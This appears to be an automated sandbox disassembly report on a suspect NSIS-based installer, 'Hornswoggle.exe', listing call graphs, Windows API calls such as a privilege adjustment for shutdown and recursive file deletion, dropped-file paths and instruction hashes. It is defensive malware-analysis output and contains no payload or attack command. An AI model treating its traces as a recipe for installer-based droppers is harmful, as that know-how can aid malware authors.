lstrlenA 3301->3302 3302->3299 3303 40328d 3302->3303 3304 4061fc 5 API calls 3303->3304 3305 403295 3304->3305 3306 4061fc 5 API calls 3305->3306 3307 40329c #17 OleInitialize SHGetFileInfoA 3306->3307 3385 405e63 lstrcpynA 3307->3385 3309 4032d9 GetCommandLineA 3386 405e63 lstrcpynA 3309->3386 3311 4032eb GetModuleHandleA 3312 403302 3311->3312 3313 405900 CharNextA 3312->3313 3314 403316 CharNextA 3313->3314 3323 403326 3314->3323 3315 4033f0 3316 403403 GetTempPathA 3315->3316 3387 4031fa 3316->3387 3318 40341b 3320 403475 DeleteFileA 3318->3320 3321 40341f GetWindowsDirectoryA lstrcatA 3318->3321 3319 405900 CharNextA 3319->3323 3397 402cb6 GetTickCount GetModuleFileNameA 3320->3397 3324 4031fa 12 API calls 3321->3324 3323->3315 3323->3319 3326 4033f2 3323->3326 3325 40343b 3324->3325 3325->3320 3328 40343f GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3325->3328 3483 405e63 lstrcpynA 3326->3483 3327 403489 3329 403523 ExitProcess CoUninitialize 3327->3329 3338 405900 CharNextA 3327->3338 3368 40350f 3327->3368 3331 4031fa 12 API calls 3328->3331 3332 403657 3329->3332 3333 403539 3329->3333 3336 40346d 3331->3336 3334 4036d9 ExitProcess 3332->3334 3335 40365f GetCurrentProcess OpenProcessToken 3332->3335 3486 405659 3333->3486 3340 4036aa 3335->3340 3341 40367a LookupPrivilegeValueA AdjustTokenPrivileges 3335->3341 3336->3320 3336->3329 3343 4034a4 3338->3343 3346 4061fc 5 API calls 3340->3346 3341->3340 3342 40351f 3342->3329 3348 4034ea 3343->3348 3349 40354f 3343->3349 3347 4036b1 3346->3347 3351 4036c6 ExitWindowsEx 3347->3351 3355 4036d2 3347->3355 3350 4059c3 18 API calls 3348->3350 3490 4055dc 3349->3490 3354 4034f5 3350->3354 3351->3334 3351->3355 3354->3329 3484 405e63 lstrcpynA 3354->3484 3503 40140b 3355->3503 3356 403570 lstrcatA lstrcmpiA 3356->3329 3359 40358c 3356->3359 3357 403565 lstrcatA 3357->3356 3361 403591 3359->3361 3362 403598 3359->3362 3493 405542 CreateDirectoryA 3361->3493 3498 4055bf CreateDirectoryA 
3362->3498 3363 403504 3485 405e63 lstrcpynA 3363->3485 3427 4037e3 3368->3427 3369 40359d SetCurrentDirectoryA 3370 4035b7 3369->3370 3371 4035ac 3369->3371 3502 405e63 lstrcpynA 3370->3502 3501 405e63 lstrcpynA 3371->3501 3374 405e85 18 API calls 3375 4035f6 DeleteFileA 3374->3375 3376 403603 CopyFileA 3375->3376 3382 4035c5 3375->3382 3376->3382 3377 40364b 3379 405d1e 38 API calls 3377->3379 3378 405d1e 38 API calls 3378->3382 3380 403652 3379->3380 3380->3329 3381 405e85 18 API calls 3381->3382 3382->3374 3382->3377 3382->3378 3382->3381 3383 4055f4 2 API calls 3382->3383 3384 403637 CloseHandle 3382->3384 3383->3382 3384->3382 3385->3309 3386->3311 3388 4060ce 5 API calls 3387->3388 3390 403206 3388->3390 3389 403210 3389->3318 3390->3389 3391 4058d5 3 API calls 3390->3391 3392 403218 3391->3392 3393 4055bf 2 API calls 3392->3393 3394 40321e 3393->3394 3506 405b05 3394->3506 3510 405ad6 GetFileAttributesA CreateFileA 3397->3510 3399 402cf9 3416 402d06 3399->3416 3511 405e63 lstrcpynA 3399->3511 3401 402d1c 3402 40591c 2 API calls 3401->3402 3403 402d22 3402->3403 3512 405e63 lstrcpynA 3403->3512 3405 402d2d GetFileSize 3406 402e2e 3405->3406 3426 402d44 3405->3426 3407 402c17 33 API calls 3406->3407 3409 402e35 3407->3409 3408 4031cd ReadFile 3408->3426 3410 402e71 GlobalAlloc 3409->3410 3409->3416 3514 4031e3 SetFilePointer 3409->3514 3413 402e88 3410->3413 3411 402ec9 3414 402c17 33 API calls 3411->3414 3419 405b05 2 API calls 3413->3419 3414->3416 3415 402e52 3417 4031cd ReadFile 3415->3417 3416->3327 3420 402e5d 3417->3420 3418 402c17 33 API calls 3418->3426 3421 402e99 CreateFileA 3419->3421 3420->3410 3420->3416 3421->3416 3422 402ed3 3421->3422 3513 4031e3 SetFilePointer 3422->3513 3424 402ee1 3425 402f5c 45 API calls 3424->3425 3425->3416 3426->3406 3426->3408 3426->3411 3426->3416 3426->3418 3428 4061fc 5 API calls 3427->3428 3429 4037f7 3428->3429 3430 4037fd 3429->3430 3431 40380f 3429->3431 3531 405dc1 wsprintfA 3430->3531 3432 405d4a 3 API calls 
3431->3432 3433 40383a 3432->3433 3435 403858 lstrcatA 3433->3435 3437 405d4a 3 API calls 3433->3437 3436 40380d 3435->3436 3515 403aa8 3436->3515 3437->3435 3440 4059c3 18 API calls 3441 40388a 3440->3441 3442 403913 3441->3442 3444 405d4a 3 API calls 3441->3444 3443 4059c3 18 API calls 3442->3443 3445 403919 3443->3445 3446 4038b6 3444->3446 3447 403929 LoadImageA 3445->3447 3448 405e85 18 API calls 3445->3448 3446->3442 3452 4038d2 lstrlenA 3446->3452 3456 405900 CharNextA 3446->3456 3449 403950 RegisterClassA 3447->3449 3450 4039cf 3447->3450 3448->3447 3453 403986 SystemParametersInfoA CreateWindowExA 3449->3453 3454 4039d9 3449->3454 3451 40140b 2 API calls 3450->3451 3455 4039d5 3451->3455 3457 4038e0 lstrcmpiA 3452->3457 3458 403906 3452->3458 3453->3450 3454->3342 3455->3454 3463 403aa8 19 API calls 3455->3463 3460 4038d0 3456->3460 3457->3458 3461 4038f0 GetFileAttributesA 3457->3461 3459 4058d5 3 API calls 3458->3459 3464 40390c 3459->3464 3460->3452 3462 4038fc 3461->3462 3462->3458 3465 40591c 2 API calls 3462->3465 3466 4039e6 3463->3466 3532 405e63 lstrcpynA 3464->3532 3465->3458 3468 4039f2 ShowWindow 3466->3468 3469 403a75 3466->3469 3471 40618e 3 API calls 3468->3471 3524 40514e OleInitialize 3469->3524 3473 403a0a 3471->3473 3472 403a7b 3474 403a97 3472->3474 3475 403a7f 3472->3475 3476 403a18 GetClassInfoA 3473->3476 3478 40618e 3 API calls 3473->3478 3477 40140b 2 API calls 3474->3477 3475->3454 3481 40140b 2 API calls 3475->3481 3479 403a42 DialogBoxParamA 3476->3479 3480 403a2c GetClassInfoA RegisterClassA 3476->3480 3477->3454 3478->3476 3482 40140b 2 API calls 3479->3482 3480->3479 3481->3454 3482->3454 3483->3316 3484->3363 3485->3368 3487 40566e 3486->3487 3488 403547 ExitProcess 3487->3488 3489 405682 MessageBoxIndirectA 3487->3489 3489->3488 3491 4061fc 5 API calls 3490->3491 3492 403554 lstrcatA 3491->3492 3492->3356 3492->3357 3494 405593 GetLastError 3493->3494 3495 403596 3493->3495 3494->3495 3496 4055a2 SetFileSecurityA 3494->3496 
3495->3369 3496->3495 3497 4055b8 GetLastError 3496->3497 3497->3495 3499 4055d3 GetLastError 3498->3499 3500 4055cf 3498->3500 3499->3500 3500->3369 3501->3370 3502->3382 3504 401389 2 API calls 3503->3504 3505 401420 3504->3505 3505->3334 3507 405b10 GetTickCount GetTempFileNameA 3506->3507 3508 403229 3507->3508 3509 405b3d 3507->3509 3508->3318 3509->3507 3509->3508 3510->3399 3511->3401 3512->3405 3513->3424 3514->3415 3516 403abc 3515->3516 3533 405dc1 wsprintfA 3516->3533 3518 403b2d 3519 405e85 18 API calls 3518->3519 3520 403b39 SetWindowTextA 3519->3520 3521 403868 3520->3521 3522 403b55 3520->3522 3521->3440 3522->3521 3523 405e85 18 API calls 3522->3523 3523->3522 3534 404094 3524->3534 3526 405198 3527 404094 SendMessageA 3526->3527 3528 4051aa CoUninitialize 3527->3528 3528->3472 3530 405171 3530->3526 3537 401389 3530->3537 3531->3436 3532->3442 3533->3518 3535 4040ac 3534->3535 3536 40409d SendMessageA 3534->3536 3535->3530 3536->3535 3539 401390 3537->3539 3538 4013fe 3538->3530 3539->3538 3540 4013cb MulDiv SendMessageA 3539->3540 3540->3539 4379 4064ae 4383 406332 4379->4383 4380 406c9d 4381 4063b3 GlobalFree 4382 4063bc GlobalAlloc 4381->4382 4382->4380 4382->4383 4383->4380 4383->4381 4383->4382 4384 406433 GlobalAlloc 4383->4384 4385 40642a GlobalFree 4383->4385 4384->4380 4384->4383 4385->4384 3643 4015b3 3644 402a3a 18 API calls 3643->3644 3645 4015ba 3644->3645 3646 40596e 4 API calls 3645->3646 3659 4015c2 3646->3659 3647 40161c 3649 401621 3647->3649 3650 40164a 3647->3650 3648 405900 CharNextA 3648->3659 3651 401423 25 API calls 3649->3651 3653 401423 25 API calls 3650->3653 3652 401628 3651->3652 3662 405e63 lstrcpynA 3652->3662 3658 401642 3653->3658 3655 4055bf 2 API calls 3655->3659 3656 4055dc 5 API calls 3656->3659 3657 401633 SetCurrentDirectoryA 3657->3658 3659->3647 3659->3648 3659->3655 3659->3656 3660 401604 GetFileAttributesA 3659->3660 3661 405542 4 API calls 3659->3661 3660->3659 3661->3659 3662->3657 4386 4016b3 4387 
402a3a 18 API calls 4386->4387 4388 4016b9 GetFullPathNameA 4387->4388 4389 4016d0 4388->4389 4390 4016f1 4388->4390 4389->4390 4393 406167 2 API calls 4389->4393 4391 401705 GetShortPathNameA 4390->4391 4392 4028cf 4390->4392 4391->4392 4394 4016e1 4393->4394 4394->4390 4396 405e63 lstrcpynA 4394->4396 4396->4390 4397 4014b7 4398 4014bd 4397->4398 4399 401389 2 API calls 4398->4399 4400 4014c5 4399->4400 4408 401d38 GetDC GetDeviceCaps 4409 402a1d 18 API calls 4408->4409 4410 401d56 MulDiv ReleaseDC 4409->4410 4411 402a1d 18 API calls 4410->4411 4412 401d75 4411->4412 4413 405e85 18 API calls 4412->4413 4414 401dae CreateFontIndirectA 4413->4414 4415 402513 4414->4415 4415->4415 3756 4051ba 3757 405365 3756->3757 3758 4051dc GetDlgItem GetDlgItem GetDlgItem 3756->3758 3760 405395 3757->3760 3761 40536d GetDlgItem CreateThread CloseHandle 3757->3761 3801 40407d SendMessageA 3758->3801 3763 4053e4 3760->3763 3764 4053ab ShowWindow ShowWindow 3760->3764 3765 4053c3 3760->3765 3761->3760 3804 40514e 5 API calls 3761->3804 3762 40524c 3770 405253 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3762->3770 3769 4040af 8 API calls 3763->3769 3803 40407d SendMessageA 3764->3803 3766 40541e 3765->3766 3767 4053d3 3765->3767 3768 4053f7 ShowWindow 3765->3768 3766->3763 3778 40542b SendMessageA 3766->3778 3772 404021 SendMessageA 3767->3772 3774 405417 3768->3774 3775 405409 3768->3775 3773 4053f0 3769->3773 3776 4052c1 3770->3776 3777 4052a5 SendMessageA SendMessageA 3770->3777 3772->3763 3780 404021 SendMessageA 3774->3780 3779 40507c 25 API calls 3775->3779 3781 4052d4 3776->3781 3782 4052c6 SendMessageA 3776->3782 3777->3776 3778->3773 3783 405444 CreatePopupMenu 3778->3783 3779->3774 3780->3766 3785 404048 19 API calls 3781->3785 3782->3781 3784 405e85 18 API calls 3783->3784 3787 405454 AppendMenuA 3784->3787 3786 4052e4 3785->3786 3790 405321 GetDlgItem SendMessageA 3786->3790 3791 4052ed ShowWindow 3786->3791 3788 405472 GetWindowRect 3787->3788 3789 405485 
TrackPopupMenu 3787->3789 3788->3789 3789->3773 3792 4054a1 3789->3792 3790->3773 3794 405348 SendMessageA SendMessageA 3790->3794 3793 405303 ShowWindow 3791->3793 3796 405310 3791->3796 3795 4054c0 SendMessageA 3792->3795 3793->3796 3794->3773 3795->3795 3797 4054dd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3795->3797 3802 40407d SendMessageA 3796->3802 3799 4054ff SendMessageA 3797->3799 3799->3799 3800 405521 GlobalUnlock SetClipboardData CloseClipboard 3799->3800 3800->3773 3801->3762 3802->3790 3803->3765 3823 40173e 3824 402a3a 18 API calls 3823->3824 3825 401745 3824->3825 3826 405b05 2 API calls 3825->3826 3827 40174c 3826->3827 3828 405b05 2 API calls 3827->3828 3828->3827 4416 401ebe 4417 402a3a 18 API calls 4416->4417 4418 401ec5 4417->4418 4419 406167 2 API calls 4418->4419 4420 401ecb 4419->4420 4421 401edd 4420->4421 4423 405dc1 wsprintfA 4420->4423 4423->4421 4424 40443f 4425 404475 4424->4425 4426 40444f 4424->4426 4428 4040af 8 API calls 4425->4428 4427 404048 19 API calls 4426->4427 4429 40445c SetDlgItemTextA 4427->4429 4430 404481 4428->4430 4429->4425 4431 40193f 4432 402a3a 18 API calls 4431->4432 4433 401946 lstrlenA 4432->4433 4434 402513 4433->4434

                                                        Control-flow Graph
                                                        [Interactive basic-block graph for 0040322B; executed and not-executed blocks are colour-coded in the original and the edge data does not survive as text. Blocks include 40322b SetErrorMode/GetVersion, 403262 call 4061fc, 403278 call 40618e/lstrlenA, 40328d call 4061fc*2/#17/OleInitialize/SHGetFileInfoA/GetCommandLineA/GetModuleHandleA, 40330c CharNextA, 403403 GetTempPathA, 40341f GetWindowsDirectoryA/lstrcatA, 40343f GetTempPathA/lstrcatA/SetEnvironmentVariableA*2, 403475 DeleteFileA/call 402cb6, 403523 ExitProcess/CoUninitialize, 403539 call 405659/ExitProcess, 40354f lstrcatA, 403570 lstrcatA/lstrcmpiA, 40359d SetCurrentDirectoryA, 4035e5 DeleteFileA, 403603 CopyFileA, 403637 CloseHandle, 40365f GetCurrentProcess/OpenProcessToken, 40367a LookupPrivilegeValueA/AdjustTokenPrivileges, 4036c6 ExitWindowsEx and 4036e7 ExitProcess.]
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 00403250
                                                        • GetVersion.KERNEL32 ref: 00403256
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040327F
                                                        • #17.COMCTL32(00000007,00000009), ref: 004032A1
                                                        • OleInitialize.OLE32(00000000), ref: 004032A8
                                                        • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 004032C4
                                                        • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 004032D9
                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Hornswoggle.exe",00000000), ref: 004032EC
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Hornswoggle.exe",00000020), ref: 00403317
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403414
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403425
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403431
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403445
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040344D
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040345E
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403466
                                                        • DeleteFileA.KERNELBASE(1033), ref: 0040347A
                                                          • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                          • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                        • ExitProcess.KERNEL32(?), ref: 00403523
                                                        • CoUninitialize.COMBASE(?), ref: 00403528
                                                        • ExitProcess.KERNEL32 ref: 00403549
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403666
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040366D
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403685
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036A4
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004036C8
                                                        • ExitProcess.KERNEL32 ref: 004036EB
                                                          • Part of subcall function 00405659: MessageBoxIndirectA.USER32(00409230), ref: 004056B4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                        • String ID: "$"C:\Users\user\Desktop\Hornswoggle.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises$C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Nicholls$C:\Users\user\Desktop$C:\Users\user\Desktop\Hornswoggle.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$error$~nsu
                                                        • API String ID: 3329125770-3060791393
                                                        • Opcode ID: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
                                                        • Instruction ID: 576d03f4a97a107fe364ed0b5bad1c5a822c5763e21245f1fe88aefb499f64b7
                                                        • Opcode Fuzzy Hash: 5e28d8b8d97ca94594f0498f32c0c003763ec4c232e88559ae5a69b57df92bfb
                                                        • Instruction Fuzzy Hash: 4DC106706082417AE7216F319D4DA2B3EA9EF85746F04457FF481B61E2CB7C9A01CB6E

                                                        Control-flow Graph (graph image not reproduced; node and edge listing follows)
                                                        control_flow_graph 126 4051ba-4051d6 127 405365-40536b 126->127 128 4051dc-4052a3 GetDlgItem * 3 call 40407d call 40491a GetClientRect GetSystemMetrics SendMessageA * 2 126->128 130 405395-4053a1 127->130 131 40536d-40538f GetDlgItem CreateThread CloseHandle 127->131 150 4052c1-4052c4 128->150 151 4052a5-4052bf SendMessageA * 2 128->151 133 4053c3-4053c9 130->133 134 4053a3-4053a9 130->134 131->130 138 4053cb-4053d1 133->138 139 40541e-405421 133->139 136 4053e4-4053eb call 4040af 134->136 137 4053ab-4053be ShowWindow * 2 call 40407d 134->137 147 4053f0-4053f4 136->147 137->133 140 4053d3-4053df call 404021 138->140 141 4053f7-405407 ShowWindow 138->141 139->136 144 405423-405429 139->144 140->136 148 405417-405419 call 404021 141->148 149 405409-405412 call 40507c 141->149 144->136 152 40542b-40543e SendMessageA 144->152 148->139 149->148 155 4052d4-4052eb call 404048 150->155 156 4052c6-4052d2 SendMessageA 150->156 151->150 157 405444-405470 CreatePopupMenu call 405e85 AppendMenuA 152->157 158 40553b-40553d 152->158 165 405321-405342 GetDlgItem SendMessageA 155->165 166 4052ed-405301 ShowWindow 155->166 156->155 163 405472-405482 GetWindowRect 157->163 164 405485-40549b TrackPopupMenu 157->164 158->147 163->164 164->158 167 4054a1-4054bb 164->167 165->158 170 405348-405360 SendMessageA * 2 165->170 168 405310 166->168 169 405303-40530e ShowWindow 166->169 171 4054c0-4054db SendMessageA 167->171 172 405316-40531c call 40407d 168->172 169->172 170->158 171->171 173 4054dd-4054fd OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 171->173 172->165 175 4054ff-40551f SendMessageA 173->175 175->175 176 405521-405535 GlobalUnlock SetClipboardData CloseClipboard 175->176 176->158
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 00405219
                                                        • GetDlgItem.USER32(?,000003EE), ref: 00405228
                                                        • GetClientRect.USER32(?,?), ref: 00405265
                                                        • GetSystemMetrics.USER32(00000002), ref: 0040526C
                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040528D
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040529E
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 004052B1
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 004052BF
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 004052D2
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004052F4
                                                        • ShowWindow.USER32(?,00000008), ref: 00405308
                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405329
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405339
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405352
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 0040535E
                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405237
                                                          • Part of subcall function 0040407D: SendMessageA.USER32(00000028,?,00000001,00403EAE), ref: 0040408B
                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040537A
                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_0000514E,00000000), ref: 00405388
                                                        • CloseHandle.KERNELBASE(00000000), ref: 0040538F
                                                        • ShowWindow.USER32(00000000), ref: 004053B2
                                                        • ShowWindow.USER32(?,00000008), ref: 004053B9
                                                        • ShowWindow.USER32(00000008), ref: 004053FF
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405433
                                                        • CreatePopupMenu.USER32 ref: 00405444
                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405459
                                                        • GetWindowRect.USER32(?,000000FF), ref: 00405479
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405492
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054CE
                                                        • OpenClipboard.USER32(00000000), ref: 004054DE
                                                        • EmptyClipboard.USER32 ref: 004054E4
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 004054ED
                                                        • GlobalLock.KERNEL32(00000000), ref: 004054F7
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040550B
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405524
                                                        • SetClipboardData.USER32(00000001,00000000), ref: 0040552F
                                                        • CloseClipboard.USER32 ref: 00405535
                                                        Strings
                                                        • Festremser Setup: Completed, xrefs: 004054AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID: Festremser Setup: Completed
                                                        • API String ID: 590372296-4016300305
                                                        • Opcode ID: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
                                                        • Instruction ID: 22ae5336f142fb48a9cf727d400d9a9d64ef180589f118636d3b9fd0a83d5397
                                                        • Opcode Fuzzy Hash: fe1231e838d9c77fe43e8816ae8d8cc6e8335f7b6b0fb41219e32569c20c3a75
                                                        • Instruction Fuzzy Hash: 0FA147B1900208BFDB119FA0DD89EAE7BB9FB08355F00407AFA05B61A0C7B55E51DF69

                                                        Control-flow Graph (graph image not reproduced; node and edge listing follows)
                                                        control_flow_graph 487 405705-40572b call 4059c3 490 405744-40574b 487->490 491 40572d-40573f DeleteFileA 487->491 493 40574d-40574f 490->493 494 40575e-40576e call 405e63 490->494 492 4058ce-4058d2 491->492 495 405755-405758 493->495 496 40587c-405881 493->496 500 405770-40577b lstrcatA 494->500 501 40577d-40577e call 40591c 494->501 495->494 495->496 496->492 499 405883-405886 496->499 502 405890-405898 call 406167 499->502 503 405888-40588e 499->503 505 405783-405786 500->505 501->505 502->492 510 40589a-4058ae call 4058d5 call 4056bd 502->510 503->492 508 405791-405797 lstrcatA 505->508 509 405788-40578f 505->509 511 40579c-4057ba lstrlenA FindFirstFileA 508->511 509->508 509->511 526 4058b0-4058b3 510->526 527 4058c6-4058c9 call 40507c 510->527 513 4057c0-4057d7 call 405900 511->513 514 405872-405876 511->514 520 4057e2-4057e5 513->520 521 4057d9-4057dd 513->521 514->496 516 405878 514->516 516->496 524 4057e7-4057ec 520->524 525 4057f8-405806 call 405e63 520->525 521->520 523 4057df 521->523 523->520 528 405851-405863 FindNextFileA 524->528 529 4057ee-4057f0 524->529 537 405808-405810 525->537 538 40581d-405828 call 4056bd 525->538 526->503 531 4058b5-4058c4 call 40507c call 405d1e 526->531 527->492 528->513 535 405869-40586c FindClose 528->535 529->525 533 4057f2-4057f6 529->533 531->492 533->525 533->528 535->514 537->528 540 405812-40581b call 405705 537->540 546 405849-40584c call 40507c 538->546 547 40582a-40582d 538->547 540->528 546->528 549 405841-405847 547->549 550 40582f-40583f call 40507c call 405d1e 547->550 549->528 550->528
                                                        APIs
                                                        • DeleteFileA.KERNELBASE(?,?,76003410,76002EE0,00000000), ref: 0040572E
                                                        • lstrcatA.KERNEL32(00420D38,\*.*,00420D38,?,?,76003410,76002EE0,00000000), ref: 00405776
                                                        • lstrcatA.KERNEL32(?,00409014,?,00420D38,?,?,76003410,76002EE0,00000000), ref: 00405797
                                                        • lstrlenA.KERNEL32(?,?,00409014,?,00420D38,?,?,76003410,76002EE0,00000000), ref: 0040579D
                                                        • FindFirstFileA.KERNELBASE(00420D38,?,?,?,00409014,?,00420D38,?,?,76003410,76002EE0,00000000), ref: 004057AE
                                                        • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040585B
                                                        • FindClose.KERNEL32(00000000), ref: 0040586C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.18210563353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.18210542810.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210589572.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000412000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000416000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210618723.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.18210871519.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_Hornswoggle.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\Hornswoggle.exe"$8B$\*.*
                                                        • API String ID: 2035342205-557117294
                                                        • Opcode ID: ba4fb821376a9003d53046d742c818a2cf143102733a919c56b59d1ddb64c9ec
                                                        • Instruction ID: 0bcf9a9e67a33d50b3dc7b196bcae3add4761e648fc1c1af8ecd3a5bcda4d25e
